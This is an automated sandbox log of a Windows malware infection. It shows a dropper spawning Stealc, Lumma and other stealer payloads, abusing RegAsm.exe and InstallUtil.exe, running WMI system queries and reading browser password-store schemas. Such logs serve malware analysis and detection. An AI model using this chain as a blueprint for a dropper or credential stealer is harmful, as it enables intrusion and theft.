                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                                  Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                  Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                  Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                  Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                  Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                  Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                                  Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3061741872.0000000068FFF000.00000002.00000001.01000000.00000020.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                  Source: RegAsm.exe, 00000009.00000002.2875623535.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.0000000003759000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.0000000003743000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2875623535.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000003.2861649685.00000000210BD000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000003.2837589880.00000000210C9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002C8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002CA4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                  Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                  Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3059879676.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                                  Source: file.exeVirustotal: Detection: 56%
                                  Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe "C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe"
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe "C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeProcess created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeProcess created: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe "C:\Users\user\AppData\Local\Temp\1000065001\stories.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000065001\stories.exeProcess created: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp "C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp" /SL5="$8045C,2980754,56832,C:\Users\user\AppData\Local\Temp\1000065001\stories.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpProcess created: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe "C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe" -i
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe "C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe "C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4024 -ip 4024
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 904
                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe "C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe "C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe "C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe"
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe "C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeProcess created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeProcess created: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe "C:\Users\user\AppData\Local\Temp\1000065001\stories.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000065001\stories.exeProcess created: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp "C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp" /SL5="$8045C,2980754,56832,C:\Users\user\AppData\Local\Temp\1000065001\stories.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpProcess created: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe "C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe" -i
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4024 -ip 4024
                                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 904
                                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: edputil.dllJump to behavior
